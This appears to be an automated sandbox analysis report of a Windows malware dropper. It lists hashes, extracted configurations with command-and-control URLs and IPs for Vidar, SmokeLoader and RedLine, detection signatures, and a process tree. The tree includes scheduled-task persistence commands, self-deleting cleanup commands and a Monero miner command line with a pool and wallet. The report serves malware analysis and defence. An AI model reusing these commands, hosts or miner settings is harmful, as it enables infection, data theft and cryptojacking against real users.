Analysis
-
max time kernel
151s -
max time network
193s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-08-2021 06:06
Static task
static1
Behavioral task
behavioral1
Sample
af01213c_ApfpjrvTmZ.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
af01213c_ApfpjrvTmZ.exe
Resource
win10v20210408
General
-
Target
af01213c_ApfpjrvTmZ.exe
-
Size
5.7MB
-
MD5
af01213c6e231fc59e9518f831a30d36
-
SHA1
d05ca19f8f8d2f72e62b4a6726cf041e7ec86f5e
-
SHA256
6814143c59108c0010bd29365823a38f61062a1978987b4798671334aa496740
-
SHA512
acb6c709dd723ec826b83dac2a6309b607f3c77e3074bf9d0617c6565f7e12a13272bd3495e3311126e1a009ba292bcdc2f79589cf8869a4b95759367846876f
Malware Config
Extracted
vidar
40
706
https://lenak513.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
vidar
40
916
https://lenak513.tumblr.com/
-
profile_id
916
Extracted
metasploit
windows/single_exec
Extracted
redline
dibild
135.148.139.222:33569
Extracted
redline
installs2
65.21.228.92:46802
Extracted
vidar
40
937
https://lenak513.tumblr.com/
-
profile_id
937
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral1/memory/2632-251-0x0000000002D50000-0x0000000003676000-memory.dmp family_glupteba behavioral1/memory/2632-253-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 772 2404 rundll32.exe 62 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 2404 rundll32.exe 62 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral1/memory/2788-263-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2592-259-0x0000000000290000-0x00000000002A9000-memory.dmp family_redline behavioral1/memory/2788-271-0x0000000000418E52-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
CustAttr .NET packer 1 IoCs
Detects CustAttr .NET packer in memory.
resource yara_rule behavioral1/memory/2544-254-0x0000000000A50000-0x0000000000A5B000-memory.dmp CustAttr -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 6 IoCs
resource yara_rule behavioral1/memory/832-169-0x0000000000400000-0x0000000002CC8000-memory.dmp family_vidar behavioral1/memory/832-142-0x0000000000240000-0x00000000002DD000-memory.dmp family_vidar behavioral1/memory/2468-211-0x0000000000280000-0x000000000031D000-memory.dmp family_vidar behavioral1/memory/2468-228-0x0000000000400000-0x0000000002CBE000-memory.dmp family_vidar behavioral1/memory/2812-305-0x0000000000400000-0x000000000095B000-memory.dmp family_vidar behavioral1/memory/2812-301-0x00000000022A0000-0x000000000233D000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00030000000130e8-76.dat aspack_v212_v242 behavioral1/files/0x00030000000130e7-78.dat aspack_v212_v242 behavioral1/files/0x00030000000130e8-77.dat aspack_v212_v242 behavioral1/files/0x00030000000130e7-79.dat aspack_v212_v242 behavioral1/files/0x00030000000130ea-82.dat aspack_v212_v242 behavioral1/files/0x00030000000130ea-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 1660 setup_installer.exe 524 setup_install.exe 832 41e718b8b1c32.exe 1952 2424320fd3.exe 920 824f4766e821701.exe 1628 689f2a8e13ce6.exe 1392 228d434d1f139.exe 1568 bee7625d7f3708.exe 296 7529e76a5fb92d7.exe 1636 228d434d1f139.exe -
resource yara_rule behavioral1/memory/2820-246-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect behavioral1/memory/2820-248-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2424320fd3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2424320fd3.exe -
Loads dropped DLL 36 IoCs
pid Process 1908 af01213c_ApfpjrvTmZ.exe 1660 setup_installer.exe 1660 setup_installer.exe 1660 setup_installer.exe 1660 setup_installer.exe 1660 setup_installer.exe 1660 setup_installer.exe 524 setup_install.exe 524 setup_install.exe 524 setup_install.exe 524 setup_install.exe 524 setup_install.exe 524 setup_install.exe 524 setup_install.exe 524 setup_install.exe 1420 cmd.exe 552 cmd.exe 552 cmd.exe 828 cmd.exe 832 41e718b8b1c32.exe 832 41e718b8b1c32.exe 1952 2424320fd3.exe 1952 2424320fd3.exe 1680 cmd.exe 1680 cmd.exe 1812 cmd.exe 1016 cmd.exe 1016 cmd.exe 1676 cmd.exe 1628 689f2a8e13ce6.exe 1628 689f2a8e13ce6.exe 1392 228d434d1f139.exe 1392 228d434d1f139.exe 296 7529e76a5fb92d7.exe 296 7529e76a5fb92d7.exe 1392 228d434d1f139.exe -
resource yara_rule behavioral1/files/0x00030000000130ef-123.dat themida behavioral1/files/0x00030000000130ef-119.dat themida behavioral1/files/0x00030000000130ef-118.dat themida behavioral1/files/0x00030000000130ef-132.dat themida behavioral1/files/0x00030000000130ef-131.dat themida behavioral1/memory/1952-176-0x00000000013C0000-0x00000000013C1000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2424320fd3.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 27 ip-api.com 164 ipinfo.io 167 ipinfo.io 4 ipinfo.io 6 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1952 2424320fd3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2396 332 WerFault.exe 52 2772 2060 WerFault.exe 57 3044 2820 WerFault.exe 75 3232 832 WerFault.exe 37 3260 2468 WerFault.exe 72 3784 1032 WerFault.exe 95 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3416 schtasks.exe 3124 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3976 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 3492 taskkill.exe 1124 taskkill.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 169 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 165 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1568 bee7625d7f3708.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1908 wrote to memory of 1660 1908 af01213c_ApfpjrvTmZ.exe 29 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 1660 wrote to memory of 524 1660 setup_installer.exe 30 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 1420 524 setup_install.exe 49 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 552 524 setup_install.exe 32 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 964 524 setup_install.exe 33 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 828 524 setup_install.exe 34 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 524 wrote to memory of 1064 524 setup_install.exe 35 PID 1420 wrote to memory of 920 1420 cmd.exe 48 PID 1420 wrote to memory of 920 1420 cmd.exe 48 PID 1420 wrote to memory of 920 1420 cmd.exe 48 PID 1420 wrote to memory of 920 1420 cmd.exe 48 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 552 wrote to memory of 832 552 cmd.exe 37 PID 524 wrote to memory of 1016 524 setup_install.exe 36 PID 524 wrote to memory of 1016 524 setup_install.exe 36 PID 524 wrote to memory of 1016 524 setup_install.exe 36 PID 524 wrote to memory of 1016 524 setup_install.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\af01213c_ApfpjrvTmZ.exe"C:\Users\Admin\AppData\Local\Temp\af01213c_ApfpjrvTmZ.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 41e718b8b1c32.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\41e718b8b1c32.exe41e718b8b1c32.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 10166⤵
- Program crash
PID:3232
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME44.exe4⤵PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 2424320fd3.exe4⤵
- Loads dropped DLL
PID:828 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\2424320fd3.exe2424320fd3.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c aea4d300485.exe4⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\aea4d300485.exeaea4d300485.exe5⤵PID:1100
-
C:\Users\Admin\AppData\Roaming\8366523.exe"C:\Users\Admin\AppData\Roaming\8366523.exe"6⤵PID:2924
-
-
C:\Users\Admin\AppData\Roaming\7668882.exe"C:\Users\Admin\AppData\Roaming\7668882.exe"6⤵PID:3012
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2304
-
-
-
C:\Users\Admin\AppData\Roaming\4353315.exe"C:\Users\Admin\AppData\Roaming\4353315.exe"6⤵PID:2144
-
-
C:\Users\Admin\AppData\Roaming\5888377.exe"C:\Users\Admin\AppData\Roaming\5888377.exe"6⤵PID:3472
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 7529e76a5fb92d7.exe4⤵
- Loads dropped DLL
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\7529e76a5fb92d7.exe7529e76a5fb92d7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c bee7625d7f3708.exe4⤵
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\bee7625d7f3708.exebee7625d7f3708.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:332
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:1276
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3312
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3416
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3580
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3676
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3124
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:2320
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:2072
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"C:\Users\Admin\AppData\Local\Temp\askinstall54.exe"7⤵PID:984
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:3296
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:3492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe"C:\Users\Admin\AppData\Local\Temp\dcc7975c8a99514da06323f0994cd79b.exe"7⤵PID:2060
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2060 -s 14048⤵
- Program crash
PID:2772
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2140
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 332 -s 10607⤵
- Program crash
PID:2396
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 228d434d1f139.exe4⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\228d434d1f139.exe228d434d1f139.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\228d434d1f139.exe"C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\228d434d1f139.exe" -a6⤵
- Executes dropped EXE
PID:1636
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 689f2a8e13ce6.exe4⤵
- Loads dropped DLL
PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 824f4766e821701.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\689f2a8e13ce6.exe689f2a8e13ce6.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1628 -
C:\Users\Admin\Documents\TquDi2pGAQ6Ks0Eacwj8YdQK.exe"C:\Users\Admin\Documents\TquDi2pGAQ6Ks0Eacwj8YdQK.exe"2⤵PID:2488
-
C:\Users\Admin\Documents\TquDi2pGAQ6Ks0Eacwj8YdQK.exeC:\Users\Admin\Documents\TquDi2pGAQ6Ks0Eacwj8YdQK.exe3⤵PID:2788
-
-
-
C:\Users\Admin\Documents\wRHoRJHqydWev4d3rwoIyxjX.exe"C:\Users\Admin\Documents\wRHoRJHqydWev4d3rwoIyxjX.exe"2⤵PID:2544
-
C:\Users\Admin\Documents\wRHoRJHqydWev4d3rwoIyxjX.exe"C:\Users\Admin\Documents\wRHoRJHqydWev4d3rwoIyxjX.exe"3⤵PID:1220
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵PID:4068
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵PID:2248
-
-
-
-
-
C:\Users\Admin\Documents\bRhauh__9XjQQ4SULArQGf2R.exe"C:\Users\Admin\Documents\bRhauh__9XjQQ4SULArQGf2R.exe"2⤵PID:2592
-
-
C:\Users\Admin\Documents\_vD9LpMG5PSJNqpgEaTQ5AJ6.exe"C:\Users\Admin\Documents\_vD9LpMG5PSJNqpgEaTQ5AJ6.exe"2⤵PID:2576
-
-
C:\Users\Admin\Documents\2rpccC7DhzGCThqIIxeNOlrr.exe"C:\Users\Admin\Documents\2rpccC7DhzGCThqIIxeNOlrr.exe"2⤵PID:2564
-
-
C:\Users\Admin\Documents\bJKEyTnQl7kZv8pLUh9VWS5u.exe"C:\Users\Admin\Documents\bJKEyTnQl7kZv8pLUh9VWS5u.exe"2⤵PID:2504
-
C:\Users\Admin\Documents\bJKEyTnQl7kZv8pLUh9VWS5u.exeC:\Users\Admin\Documents\bJKEyTnQl7kZv8pLUh9VWS5u.exe3⤵PID:2768
-
-
-
C:\Users\Admin\Documents\xyViPM_S05hjK5k2sAIOVK0N.exe"C:\Users\Admin\Documents\xyViPM_S05hjK5k2sAIOVK0N.exe"2⤵PID:2480
-
-
C:\Users\Admin\Documents\jN0KGYupxnOouV5czbiQQ_pO.exe"C:\Users\Admin\Documents\jN0KGYupxnOouV5czbiQQ_pO.exe"2⤵PID:2468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 9723⤵
- Program crash
PID:3260
-
-
-
C:\Users\Admin\Documents\TsFR9WElFV_zXMF4gTWztmog.exe"C:\Users\Admin\Documents\TsFR9WElFV_zXMF4gTWztmog.exe"2⤵PID:2644
-
-
C:\Users\Admin\Documents\NqtS9Srib5TaNOEkzVABa_Jb.exe"C:\Users\Admin\Documents\NqtS9Srib5TaNOEkzVABa_Jb.exe"2⤵PID:2632
-
-
C:\Users\Admin\Documents\7UJ0PGXS5XquGyNZPeQxZ1GR.exe"C:\Users\Admin\Documents\7UJ0PGXS5XquGyNZPeQxZ1GR.exe"2⤵PID:2724
-
-
C:\Users\Admin\Documents\coty8fqgnKcg3VfQiJn9GPxS.exe"C:\Users\Admin\Documents\coty8fqgnKcg3VfQiJn9GPxS.exe"2⤵PID:2692
-
-
C:\Users\Admin\Documents\mHFv6VP000fmqSDwK_gKUKvE.exe"C:\Users\Admin\Documents\mHFv6VP000fmqSDwK_gKUKvE.exe"2⤵PID:2004
-
C:\Users\Admin\AppData\Roaming\5428478.exe"C:\Users\Admin\AppData\Roaming\5428478.exe"3⤵PID:3920
-
-
C:\Users\Admin\AppData\Roaming\8106308.exe"C:\Users\Admin\AppData\Roaming\8106308.exe"3⤵PID:3916
-
-
-
C:\Users\Admin\Documents\kk2RGvogZkmUJzZaKJQOJU1N.exe"C:\Users\Admin\Documents\kk2RGvogZkmUJzZaKJQOJU1N.exe"2⤵PID:2896
-
-
C:\Users\Admin\Documents\uaAXhSp8VAwn7UNbrMF4Fle2.exe"C:\Users\Admin\Documents\uaAXhSp8VAwn7UNbrMF4Fle2.exe"2⤵PID:2584
-
C:\Users\Admin\AppData\Roaming\8670915.exe"C:\Users\Admin\AppData\Roaming\8670915.exe"3⤵PID:3592
-
-
C:\Users\Admin\AppData\Roaming\4378776.exe"C:\Users\Admin\AppData\Roaming\4378776.exe"3⤵PID:3732
-
-
-
C:\Users\Admin\Documents\y84sSf1dGEVMmCa_YkBLSdNX.exe"C:\Users\Admin\Documents\y84sSf1dGEVMmCa_YkBLSdNX.exe"2⤵PID:2812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im y84sSf1dGEVMmCa_YkBLSdNX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\y84sSf1dGEVMmCa_YkBLSdNX.exe" & del C:\ProgramData\*.dll & exit3⤵PID:3524
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im y84sSf1dGEVMmCa_YkBLSdNX.exe /f4⤵
- Kills process with taskkill
PID:1124
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3976
-
-
-
-
C:\Users\Admin\Documents\y1Pv5XVaIhSTHZCLkDdV0e2K.exe"C:\Users\Admin\Documents\y1Pv5XVaIhSTHZCLkDdV0e2K.exe"2⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\is-BK7OD.tmp\y1Pv5XVaIhSTHZCLkDdV0e2K.tmp"C:\Users\Admin\AppData\Local\Temp\is-BK7OD.tmp\y1Pv5XVaIhSTHZCLkDdV0e2K.tmp" /SL5="$70164,138429,56832,C:\Users\Admin\Documents\y1Pv5XVaIhSTHZCLkDdV0e2K.exe"3⤵PID:3540
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC76644D4\824f4766e821701.exe824f4766e821701.exe1⤵
- Executes dropped EXE
PID:920
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"1⤵PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 2762⤵
- Program crash
PID:3044
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"1⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:3244
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"1⤵PID:2792
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:772 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1336
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:1032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 2242⤵
- Program crash
PID:3784
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3964